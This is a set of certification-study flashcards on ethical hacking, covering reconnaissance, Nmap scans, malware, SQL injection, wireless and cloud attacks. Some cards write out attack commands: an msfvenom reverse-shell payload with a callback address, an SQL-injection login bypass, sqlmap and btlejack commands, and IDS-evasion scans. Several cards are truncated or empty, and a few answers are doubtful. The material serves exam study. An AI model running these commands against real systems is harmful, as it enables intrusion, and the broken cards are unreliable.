Fast Track Flashcards

1
Q

Reconnaissance

A

Cyber Kill Chain stage that precedes the Weaponization stage.

2
Q

Weaponization

A

Stage of the Cyber Kill Chain where you select or create a client-side backdoor to send to users' collected email addresses

3
Q

Delivery

A

Third stage of the Cyber Kill Chain, where the attacker sends the weaponized bundle to the victim using email, USB, etc.

4
Q

Actions on objectives

A

Cyber kill chain stage where data exfiltration occurs

5
Q

Unspecified proxy activities

A

Multiple domains pointing to the same host to switch quickly between the domains and avoid detection

6
Q

White hat

A

Would notify the system owner and the software vendor if they found a zero-day vulnerability.

7
Q

Gray Hats

A

Gray hats are the individuals who work both offensively and defensively at various times.

8
Q

Reconnaissance

A

Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization's clients, employees, operations, network, and systems.

9
Q

Clearing Tracks

A

The attacker overwrites the server, system, and application logs to avoid suspicion

10
Q

Determine the impact of the change

A

The first consideration when implementing a change is to determine the impact of the change

11
Q

Operational Threat Intelligence

A

Operational threat intelligence provides information about specific threats against the organization. It provides contextual information about security events and incidents that help defenders disclose potential risks, provide greater insight into attacker methodologies, identify past malicious activities, and perform investigations on malicious activity in a more efficient way.

12
Q

Technical Threat Intelligence

A

This intelligence is directly fed into the security devices in digital format to block and identify inbound and outbound malicious traffic entering the organization’s network.

13
Q

Incident triage

A

Phase where type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited are analyzed

14
Q

PCI-DSS

A

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards

15
Q

HIPAA

A

Regulations that protect personal medical records (PHI)

16
Q

PHI

A

Personal Health Information (personal medical records)

17
Q

SOX

A

Sarbanes-Oxley Act is designed to protect investors and the public by increasing the accuracy and reliability of corporate accounting disclosures

18
Q

[site:]

A

site: This operator restricts search results to the specified site or domain.

19
Q

[related:]

A

related: This operator displays websites that are similar or related to the URL specified.

20
Q

[Filetype:]

A

Filetype: This operator allows you to search for results based on a file extension.

21
Q

Reverse Image Search

A

Reverse image search helps an attacker in tracking the original source and details of images, such as photographs, profile pictures, and memes

22
Q

Censys

A

Attackers use IoT search engines, such as Censys, to gather information about the target IoT devices, such as manufacturer details, geographical location, IP address, hostname, and open ports. Censys continually monitors every reachable server and device on the Internet, so one can search for and analyze them in real time.

23
Q

Dark web footprinting

A

Uses specialized tools or search engines to encrypt browsing activity and navigate anonymously

24
Q

Hootsuite

A

An automated geolocation tool

25
Q

Website mirroring

A

Copying an entire website to a local drive to view the directory structure, file structure, external links, etc.

26
Q

CeWL

A

An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.

27
Q

Web-Stat

A

A tool to monitor websites, analyze the website's traffic, and track the geographical location of the users visiting the website.

28
Q

Infoga

A

A tool to track the target's emails and extract information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources.

29
Q

Whois footprinting

A

Gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date

30
Q

RIPE NCC

A

Regional Internet Registry for Europe

31
Q

Bluto

A

An automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records.

32
Q

ARIN

A

An online tool to retrieve information such as the network range of the target organization

33
Q

Impersonation

A

Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information.

34
Q

OSINT framework

A

OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance activities.

35
Q

ACK flag probe scan

A

Discovers devices hidden by a restrictive firewall

36
Q

-PP

A

Nmap / Zenmap ICMP Timestamp Ping Scan: # nmap -PP <target>

37
Q

-PS

A

Nmap / Zenmap SYN Ping Scan: # nmap -PS <target>

38
Q

nmap -sn -PS <target IP address>

A

TCP SYN ping scan

39
Q

TCP Maimon scan

A

Sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed

40
Q

Stateful firewall

A

Does not respond with RST to an ACK packet sent to a closed port

41
Q

-sA

A

Nmap ACK flag probe scan. Attackers send an ACK probe packet with a random sequence number; no response implies that the port is filtered (a stateful firewall is present), whereas an RST response means that the port is not filtered.

42
Q

-sV

A

In Nmap, the -sV option is used to detect type and service versions.

43
Q

Idle scanning

A

Uses a zombie system with low network activity and predictable IP identification (IPID) numbers

44
Q

Banner grabbing

A

Using the -sV flag with Nmap

45
Q

128

A

Windows OS TTL

46
Q

-D

A

Nmap / Zenmap IP Address Decoy scan. The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls: # nmap -D RND:10 [target]

47
Q

-T0

A

Nmap / Zenmap Paranoid Timing Option. The paranoid timing option makes the least noise, which helps evade IDS: # nmap -T0 [target]

48
Q

Linux OS

A

Uses TTL of 64 and Window size of 5840

49
Q

Scanning networks

A

Assists in drawing network diagrams. Drawing a network diagram helps an attacker to identify the topology or architecture of a target network.

50
Q

SMB

A

Runs on TCP ports 139 and 445

51
Q

389

A

Unsecured LDAP port; it should be changed to 636 (LDAPS)

52
Q

SNMP

A

Uses UDP port 161. If you find unencrypted SNMP traffic on your network, change to SNMP v3

53
Q

<03>

A

NetBIOS code for the messenger service

54
Q

LNMIB2.MIB

A

Contains object types for workstation and server services

55
Q

Jxplorer

A

Tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, and departmental details.

56
Q

SMTP Enumeration

A

SMTP provides 3 built-in commands:
VRFY - Validates users
EXPN - Shows the actual delivery addresses of aliases and mailing lists
RCPT TO - Defines the recipients of a message

57
Q

DNS Cache Snooping

A

DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user.

58
Q

FTP Enumeration

A

The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21.

59
Q

NTLM

A

Can be used to secure an LDAP service against anonymous queries

60
Q

LDAP Enumeration Countermeasures

A

By default, LDAP traffic is transmitted unsecured (port 389); therefore, use Secure Sockets Layer (SSL) or STARTTLS technology to encrypt the traffic (port 636).

61
Q

False positives

A

Vulnerabilities found in a tool-based vulnerability assessment that are not true vulnerabilities

62
Q

Medium

A

CVSS v3.0 severity rating range 4.0-6.9

63
Q

4.0-6.9

A

CVSS v3.1 medium severity rating range

64
Q

Remediation

A

Process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities

65
Q

Vulnerability-management life cycle

A

The phases involved in vulnerability management are:
1. Identify assets and create a baseline
2. Vulnerability scan
3. Risk assessment
4. Remediation
5. Verification
6. Monitor

66
Q

Passive Assessment

A

Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.

67
Q

External Assessment

A

External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers.

68
Q

Host-based Assessment

A

Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors.

69
Q

Network-based scanner

A

Scans other machines on the network to identify vulnerabilities.

70
Q

Wireless Network Assessment

A

Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. Many networks still use weak and outdated security mechanisms and are open to attack.

71
Q

Host-based assessment

A

Can identify vulnerabilities in user directories, registries, native configuration tables, incorrect registry or file permissions, and software configuration errors.

72
Q

Inference-based assessment

A

After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

73
Q

Steps followed by Vulnerability Scanners

A

1. Locating nodes
2. Performing service and OS discovery on them
3. Testing those services and OS for known vulnerabilities

74
Q

Gaining access

A

May involve infecting a system with malware and using phishing to gain credentials to a system or web application

75
Q

Dictionary Attack

A

In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password.

76
Q

Internal monologue attack

A

Steps to perform an internal monologue attack:
1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic.
2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.

77
Q

Some password-cracking tools are listed as follows:

A

John the Ripper
hashcat
THC-Hydra
Medusa

78
Q

Password salting

A

Extra data is added to a password before hashing to defeat Rainbow tables

79
Q

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.13 LPORT=4444 -f exe > shell.exe

A

Generates reverse TCP shellcode for Windows

80
Q

Buffer overflow

A

char buff[12];

81
Q

MITRE.org CVE

A

MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.

82
Q

Getsystem

A

Use Metasploit commands such as getsystem to gain administrative-level privileges and extract password hashes of the admin/user accounts.

83
Q

Kernel-Level Rootkit

A

The kernel is the core of an OS. A kernel-level rootkit runs in Ring 0 with the highest OS privileges. These cover backdoors on the computer and are created by writing additional code, or by substituting portions of kernel code with modified code via device drivers in Windows or loadable kernel modules in Linux.

84
Q

.bash_history

A

Maintains a log of typed input

85
Q

DNS tunneling

A

Embedding malicious data into the DNS protocol packets that even DNSSEC cannot detect

86
Q

UNIX / Linux

A

Files in UNIX / Linux can be hidden just by appending a dot (.) in front of a file name

87
Q

Adware

A

Causes annoying pop-ups with advertisements

88
Q

Advanced persistent threat

A

Remains undetected for a long time and obtains sensitive information without sabotaging the organization.

89
Q

Initial intrusion

A

The Initial Intrusion phase of the APT lifecycle includes:
1. Deployment of malware
2. Establishment of outbound connection

90
Q

Initial intrusion

A

Attacker attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers

91
Q

DDoS Trojans

A

The Mirai IoT botnet Trojan is still considered one of the most notorious DDoS attack Trojans

92
Q

Stealth virus

A

A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive.

93
Q

Encryption virus

A

Can cipher itself and change its own code

94
Q

Computer Worms

A

Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention.

95
Q

File-less malware

A

AV tools are unable to find it

96
Q

Launching Fileless Malware through Phishing

A

Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. They send spam emails embedded with malicious links to the victim. When the victim clicks on the link, he/she will be directed to a fraudulent website that automatically loads Flash and triggers the exploit.

97
Q

VirusTotal

A

A free service that analyzes suspicious files

98
Q

Credential Enumerator

A

It is a self-extracting RAR file containing two components. One is the bypass component, and the other is the service component. The bypass component is used for the enumeration of network resources and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force user accounts, including the administrator account.

99
Q

BetterCAP

A

A tool to send fake ARP messages over the target network to link a MAC address with the target system’s IP address

100
Q

MAC flooding

A

MAC flooding involves the flooding of the CAM table with fake MAC address and IP pairs until it is full

101
Q

DHCP starvation

A

Attack that leases all the DHCP addresses available in the DHCP scope.

102
Q

STP attack

A

Attacker plugs in a rogue switch with a lower priority than any other switch to make it a root bridge

103
Q

The attacker makes a request to the DNS resolver

A

First step in conducting DNS cache poisoning

104
Q

Phishing

A

The attacker pretends to be technical support staff of the targeted organization's software vendors or contractors

105
Q

Honey trap

A

Attackers target a person inside the company online, pretending to be an attractive person. They then begin a fake online relationship to obtain confidential information about the target company

106
Q

Impersonation

A

The attacker may impersonate a technician and gather sensitive information by scanning terminals for passwords, searching for important documents on employees' desks, and rummaging through bins.

107
Q

Scareware

A

Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.

108
Q

Phishing

A

Redirects to malicious websites by sending a malicious link which appears to be real by email.

109
Q

Pharming

A

The attacker redirects web traffic to a fraudulent website by installing a malicious program on a personal computer or server. Can be performed in two ways: DNS cache poisoning and host file modification

110
Q

Evilginx

A

Phishing tool

111
Q

Whaling

A

A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information.

112
Q

Spoofed Session Flood Attack

A

In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets to perform DDoS attacks against target networks, exhausting their network resources.

113
Q

Slowloris attack

A

A DDoS attack. Partial HTTP requests are sent to open multiple connections and slow down the application.

114
Q

Hit-list scanning technique

A

Collects information about a large number of vulnerable machines to create a list, then infects the machines to create a botnet

115
Q

DoS/DDoS Countermeasure

A

Implement cognitive radios in the physical layer to handle jamming and scrambling attacks

116
Q

Grabs the user’s session cookie and session ID

A

document.write('<img>');

117
Q

Session donation attack

A

The attacker obtains a valid session ID and feeds the same session ID to the victim. The session ID links the victim to the attacker's account page. The victim's sensitive payment details entered in a form are linked to the attacker's account.

118
Q

TCP/IP hijacking

A

Monitoring established traffic between the victim and host to predict the ISN, using the ISN to spoof packets sent to the host, hanging the victim's connection, and impersonating the victim to communicate with the host.

119
Q

Burp Suite

A

Burp Suite contains the following key components:
- An intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application
- An intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities
- A sequencer tool for testing the randomness of session tokens

120
Q

FTPS

A

Sends data using encryption and digital certificates

121
Q

VPN

A

A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information.

122
Q

False positive

A

IDS raises an alarm when no attack has taken place

123
Q

DMZ

A

DMZ should always be used when the company has publicly available servers

124
Q

Web Server

A

The web server should be internet facing, but application and database servers should not.

125
Q

Honeypot

A

An appealing isolated environment for hackers

126
Q

Obfuscating

A

Encoding packets with Unicode characters. IDS cannot recognize the packets, but web server can decode them.

127
Q

Some online anonymizers include:

A

https://proxify.com
http://www.guardster.com
http://anonymouse.org

128
Q

NSTX

A

Runs on port 53

129
Q

Detecting the presence of Honeyd Honeypot

A

An attacker can identify the presence of a Honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior).

130
Q

AndroidManifest.xml

A

The file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application

131
Q

DNS hijacking

A

When the user enters a legitimate URL in a browser, the settings will redirect to the attacker’s fake site. User may be prompted to re-enter credentials as if they have never visited the site before, and the site may not be secure.

132
Q

Directory traversal

A

Dot-dot-slash (../) character string in a URL, used to navigate to a parent directory on a web server

133
Q

php.ini

A

Can be misconfigured to provide verbose error messages

134
Q

Server-side request forgery (SSRF) attack

A

A designer can utilize a URL such as https://xyz.com/feed.php?url=externalsite.com/feed/to to obtain a remote feed

135
Q

Robots.txt

A

A file used to discover the structure of a website

136
Q

Web Server Footprinting

A

By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OSs, software versions, server names, and database schema details

137
Q

Patch management

A

Failure would be not applying fixes in a timely fashion. Example: Company is breached several months after a fix is available from the vendor

138
Q

Limiting the administrator or root-level access to the minimum number of users

A

Helps secure the user accounts on the web server

139
Q

Syhunt Hybrid

A

Syhunt Hybrid crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks.

140
Q

Web application security scanners:

A

Netsparker
Burp Suite

141
Q

WS-Security

A

Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.

142
Q

Server-Side Includes Injection

A

Server-side Includes is an application feature that helps designers to auto-generate the content of the web page without manual involvement. Such an application accepts remote user inputs and uses them on the page.

143
Q

XXE

A

XML External Entity malicious request example:

144
Q

Watering Hole Attack

A

It is a type of unvalidated redirect attack whereby the attacker first identifies the most visited website of the target, determines the vulnerabilities in the website, injects malicious code into the vulnerable web application, and then waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.

145
Q

ClickJacking Attack

A

The attacker creates a transparent 'iframe' in front of the URL which the victim attempts to click, but actually he/she clicks on the content or URL that exists in the transparent 'iframe' which is set up by the attacker.

146
Q

Side-channel attack

A

Attackers perform character by character password examination and exploit the timing information to determine the position where the password comparison failed. Then, attackers use this data to determine the target user’s password.

147
Q

Banner Grabbing

A

Banner grabbing using wget: wget -S [target]

148
Q

Wordlist

A

Gobuster tool’s fastest option

149
Q

Verbose Failure Messages

A

When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate valid data required to access the application. The list of enumerated data can also be used later for social engineering.

150
Q

WS-Address Spoofing

A

WS-Address provides additional routing information in the SOAP header to support asynchronous communication.

151
Q

RESTful API

A

A web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.

152
Q

Webhooks

A

User-defined HTTP callback or push APIs that are raised based on trigger events

153
Q

No ABAC Validation

A

No proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting

154
Q

.stm

A

Server-side Include Injection: Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks.

155
Q

Bug bounty program

A

Vulnerability disclosure program opened by companies

156
Q

select * from Users where UserName = 'attack' or 1=1

A

--' and UserPassword = '123456' (SQL command executed by the server when you enter into a login form: Username: attack' or 1=1-- Password: 123456)

157
Q

Union SQL Injection

A

In a UNION SQL injection, an attacker combines a forged query with a query requested by the user using a UNION clause. The result of the forged query will be appended to the result of the original query, which makes it possible to obtain the values of fields from other tables.

158
Q

Union SQL Injection

A

Use the UNION operator to combine the result sets of two or more SELECT statements if they have the same structure

159
Q

Blind SQL Injection

A

Attacker can steal data by asking a series of true or false questions through SQL statements.

160
Q

Time-based

A

SQL injection attack testing the response time of a true or false response.

161
Q

Boolean-based

A

SQL injection attack to determine whether the database will return true or false results for user IDs.

162
Q

Out-of-band SQLi

A

May use DNS requests to retrieve information for the attacker

163
Q

Variation

A

Placing characters such as “' or '1'='1'” in any basic injection statement such as “or 1=1.”

164
Q

Whitelist Validation

A

Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted.

165
Q

WEP

A

Was designed to mimic wired encryption.

166
Q

WPA 3 - Personal

A

It is mainly used to deliver password-based authentication using the SAE protocol, also known as Dragonfly Key Exchange, which replaces the PSK concept used in WPA2-Personal. It is resistant to offline dictionary attacks and key recovery attacks.

167
Q

WPA3-Enterprise

A

allows 192-bit minimum-strength security protocols such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.

168
Q

KRACK

A

Adversary tricks a victim into reinstalling an already-in-use key. Associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values.

169
Q

Finding WPS-Enabled APs

A

Attackers use the Wash command-line utility to identify WPS-enabled APs in the target wireless network.

170
Q

Evil-Twin attack

A

An evil twin is a wireless AP that pretends to be a legitimate AP by imitating its SSID. Often won’t require authentication where the legitimate AP does.

171
Q

aLTEr attack

A

Wireless attack where the attacker launches an MITM attack using a fake communication tower, intercepting the user data and redirecting the user to a malicious site.

172
Q

Dragonblood

A

WPA3 encryption

173
Q

Downgrade Security Attacks

A

To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network.

174
Q

Bluesnarfing

A

Theft of information from a wireless device through Bluetooth

175
Q

btlejack -f 0x9c68fd30 -t -m 0x1fffffffff

A

Btlejacking using BtleJack: start hijacking the connection using the following command: btlejack -f 0x9c68fd30 -t -m 0x1fffffffff

176
Q

Disable SSID broadcasting

A

To make a wireless network undiscoverable

177
Q

Wardriving

A

Attackers drive around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.

178
Q

Agent Smith attack

A

Legitimate smartphone apps are replaced by deceptive applications that appear legitimate.

179
Q

Spearphone Attack

A

A spearphone attack allows Android apps to record loudspeaker data without any privileges.

180
Q

Advanced SMS Phishing

A

The attack vector mainly depends on a process called Over-the-Air (OTA) provisioning, which is mainly used by network operators. The attacker exploits the mobile device by sending messages that seem to be genuine from the network operator.

181
Q

Untethered jailbreaking

A

Patches the kernel so the device stays jailbroken after each successive reboot

182
Q

iOS trustjacking

A

Vulnerability that can be exploited by an attacker to read messages and emails by exploiting the “iTunes Wi-Fi Sync” feature.

183
Q

Trident

A

Trident is capable of taking complete control of the target mobile device, and it allows attackers to monitor and track all the user activities. It also allows attackers to record audio, capture screenshots, and monitor all phone calls and SMS messages.

184
Q

Reverse engineering

A

Reverse engineering is used to disassemble a software program or a mobile application to analyze its design flaws and fix any bugs that are residing in it.

185
Q

Zigbee

A

based on the IEEE 203.15.4 standard (This is a typo in the book and on the exam — the actual standard is 802.15.4)

186
Q

Power/Clock/Reset Glitching

A

These types of attacks occur when faults or glitches are injected into the power supply that can be used for remote execution, also causing the skipping of key instructions. Faults can also be injected into the clock network used for delivering a synchronized signal across the chip.

187
Q

Replay attack

A

1. Attacker targets the specified frequency
2. After obtaining the frequency, the attacker can capture the original data when the commands are initiated by the connected devices
3. Once the original data is collected, the attacker uses free tools such as URH (Universal Radio Hacker) to segregate the command sequence
4. Attacker then injects the segregated command sequence on the same frequency

188
Q

FCC ID search

A

Helps in finding the details of devices and the certification granted to them.

189
Q

IoTSeeker

A

IoTSeeker will scan a network for specific types of IoT devices to detect whether they are using the default, factory-set credentials.

190
Q

48101

A

Port commonly used by compromised IoT devices to spread malware

191
Q

HMI-based Attacks

A

Attackers often try to compromise an HMI system as it is the core hub that controls critical infrastructure. If attackers gain access over HMI systems, they can cause physical damage to the SCADA devices (industrial automation components) or collect sensitive information related to the critical architecture that can be used later to perform malicious activities.

192
Q

nmap -Pn -sU -p 44818 --script enip-info <Target IP>

A

Using the above command, attackers can gather information such as the name of the vendor, product code and name, device name, IP address, etc.

193
Q

Flowmon

A

Empowers manufacturers and utility companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity.

194
Q

SaaS

A

The subscriber is responsible for the management of users. The provider is responsible for the hardware, operating system, and software administration, including patching and monitoring.

195
Q

Infrastructure as a Service

A

Infrastructure as a Service requires the subscriber to take the most responsibility for maintenance of resources

196
Q

Community

A

A group of users or organizations share a cloud environment

197
Q

Cloud carrier

A

Provides internet connectivity and transport services between the organization and the cloud service provider

198
Q

Cloud Carrier

A

A cloud carrier acts as an intermediary that provides connectivity and transport services between CSPs and cloud consumers.

199
Q

Tier-2: Testing and accreditation systems

A

Validates image contents, signs images, and sends them to the registries.

200
Q

Docker

A

Docker provides a PaaS through OS-level virtualization and delivers containerized software packages. This technology isolates applications from the underlying infrastructure for faster software delivery.

201
Q

Docker daemon

A

A component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.

202
Q

Kube-scheduler

A

Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.

203
Q

Lock-in

A

The difficulties experienced by a user when migrating from in-house systems or from one cloud service provider to another, due to the lack of tools, procedures, or standard data formats, pose potential threats to data, application, and service portability

204
Q

Unsynchronized System Clocks

A

The failure to synchronize clocks at the end systems can affect the working of automated tasks. For example, if the cloud computing devices do not have synchronized or matched times, then timestamp inaccuracy leaves the network administrator unable to analyze the log files accurately for any malicious activity.

205
Q

Cloud hopper attack

A

Attackers initiate spear-phishing emails with custom-made malware to compromise the accounts of staff or cloud service firms to obtain confidential information

206
Q

Cloudborne Attack

A

Cloudborne is a vulnerability residing in a bare-metal cloud server that enables attackers to implant a malicious backdoor in its firmware.

207
Q

Social engineering

A

May involve phone calls posing as a legitimate employee or sending phishing emails

208
Q

Zero Trust Networks

A

The Zero Trust model is a security implementation that by default assumes every user trying to access the network is not a trusted entity and verifies every incoming connection before allowing access to the network.

209
Q

Triple Data Encryption Standard

A

64-bit blocks, 3 keys, 56-bit keys

210
Q

Serpent

A

Serpent involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. It uses a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits.

211
Q

CAST-128

A

CAST-128 is a symmetric-key block cipher having: a classical 12- or 16-round Feistel network with a block size of 64 bits; 8x32-bit S-boxes (S1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations; a masking key (Km1) and a rotation key (Kr1) for performing its functions.

212
Q

TPM

A

Hardware on a computer’s motherboard that generates encryption keys

213
Q

Twofish

A

Encryption algorithm uses 128-bit block size, and key size up to 256 bits

214
Q

Private Key

A

Sender’s private key signs a message by encrypting the hash (or checksum)

215
Q

Public Key

A

Sender’s public key verifies (confirms) a message signature

216
Q

Recipient’s public key

A

Recipient’s public key is used to encrypt a message

217
Q

GNU Privacy Guard (GPG)

A

GNU Privacy Guard (GPG) is a software replacement of PGP and free implementation of the OpenPGP standard that is used to encrypt and decrypt data.

218
Q

Web of trust (WOT)

A

In WOT, every PGP user in the network has a ring of public keys to encrypt the data, and they introduce many other users whom they trust. In this trust model, a user encodes the data with the receiver’s public key that is decrypted only by the receiver’s private key.

219
Q

Key archival

A

BitLocker keys can be stored in, and recovered from, Active Directory

220
Q

Key stretching

A

In the key stretching technique, the initial key is given as input to an algorithm that generates an enhanced key. The key must be sufficiently resistant to brute-force attacks.

221
Q

Hash Injection/Pass-the-Hash (PtH) Attack

A

A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources.

222
Q

Duplicate MAC addresses

A

Duplicate MAC addresses in your ARP table can indicate an ARP spoofing attack

223
Q

sqlmap.py -u [TargetURL] --dbs

A

In this query, -u specifies the target URL and --dbs enumerates DBMS databases.

224
Q

DROWN attack

A

The same private-key certificate is used on a different server that allows SSLv2 connections, which can leak key information.

225
Q

provide answers to security questions

A

Problem with social media posts that ask personal questions under the guise of getting to know you better

226
Q

Bettercap

A

Bettercap is the most suitable tool for conducting a session hijacking attack on a wireless network with WPA-PSK security, due to its advanced capabilities in network analysis and versatility in handling various security protocols.

227
Q

Brute Force

A

A Brute Force attack directly leverages the absence of an account lockout policy and the presence of detailed error messages that provide feedback on login attempts.

228
Q

Raw Sniffing

A

Raw Sniffing allows for the passive capture of all network traffic, providing a comprehensive view of data flow without actively manipulating network behavior.

229
Q

‘blind’ SQL Injection attack

A

A ‘blind’ SQL Injection attack allows for data extraction through true or false responses from the application, effectively circumventing input validation measures that block suspicious patterns.

230
Q

Error-based SQL Injection

A

Error-based SQL Injection takes advantage of the detailed error messages provided by the application to understand the database structure and formulate effective injection queries.

231
Q

digital signature mechanism

A

Applying a digital signature mechanism ensures the integrity and authenticity of data upon retrieval, verifying that it hasn’t been altered or tampered with since being signed.

232
Q

SSL/TLS encryption

A

Implementing SSL/TLS encryption for data transmission ensures secure and encrypted communication, effectively preventing Man-in-the-Middle attacks from intercepting or manipulating the data.

233
Q

Data encryption with AES-256

A

Data encryption with AES-256 offers a high level of security and performs better than older algorithms like 3DES, while also efficiently balancing security and performance needs in the face of potential quantum computing threats.

234
Q

Implementing WPA2 or WPA3 encryption

A

Implementing WPA2 or WPA3 encryption is a suitable security measure, as it provides strong protection for the Wi-Fi network and is straightforward to set up and manage, making it ideal for an environment with limited technical knowledge.

235
Q

Applying asymmetric encryption with RSA

A

Applying asymmetric encryption with RSA and using the private key for signing ensures confidentiality through encryption and non-repudiation by using the private key for digital signing.

236
Q

Enabling encryption

A

Enabling encryption on the wireless network is the most effective first step to mitigate the risk of Wi-Fi eavesdropping, as it secures all data transmitted over the network, making it difficult for unauthorized individuals to intercept and understand the communications.

237
Q

WPA3 encryption

A

Implementing WPA3 encryption for the store’s Wi-Fi network is the most suitable measure to mitigate the risk of Wardriving attacks, as it provides strong security without affecting the customer experience of accessing in-store Wi-Fi.

238
Q

Passive reconnaissance

A

Passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research, allow for the collection of valuable information without sending traffic to the target network, thus avoiding detection by intrusion detection systems.

239
Q

Cloud Access Security Broker (CASB)

A

Using a Cloud Access Security Broker (CASB) is the best solution for achieving unified security management across multiple cloud platforms, as it enables consistent enforcement of security policies, threat monitoring, and visibility into cloud resources.

240
Q

q=17, T=220

A

q=17, T=220: In this scenario, the total delay caused by the attacker (‘q*d’ = 221 seconds) exceeds the threshold of 200, indicating a high likelihood of triggering a security alert

241
Q

MAC flooding

A

MAC flooding can overwhelm the switch’s memory, a technique that can cause the switch to behave like a hub, thus enabling the attacker to capture packets intended for other hosts in the network.

242
Q

Sublist3r

A

Employ a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT (Open Source Intelligence), as it specifically targets the discovery of subdomains, making it highly efficient for this particular task.

243
Q

Captive portal page

A

Displaying a captive portal page that warns users about the possibility of Evil Twin attacks is the most effective and user-friendly measure, as it educates users about the risk without requiring them to install additional software or change their connection habits.

244
Q

employee awareness training

A

Organize regular employee awareness training regarding social engineering techniques and preventive measures, as this is crucial in educating the workforce about the nature of social engineering attacks, which often exploit human psychology rather than technological vulnerabilities.

245
Q

network segmentation

A

Using network segmentation to isolate IoMT devices from the main network is the main recommendation, as it limits the potential impact of a breach and reduces the risk of IoMT devices being used as entry points for network-wide attacks.

246
Q

Vulnerability scanning

A

Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time, meaning it might not identify new vulnerabilities that emerge after the scan, which is particularly relevant given the dynamic nature of the network environment described, including legacy applications and outdated systems.

247
Q

Cross-Site Scripting (XSS) attack

A

A Cross-Site Scripting (XSS) attack can bypass JavaScript client-side sanitization and exploit the exposure of session cookies not set with the HttpOnly flag

248
Q

The total number of high, medium, and low-risk vulnerabilities

A

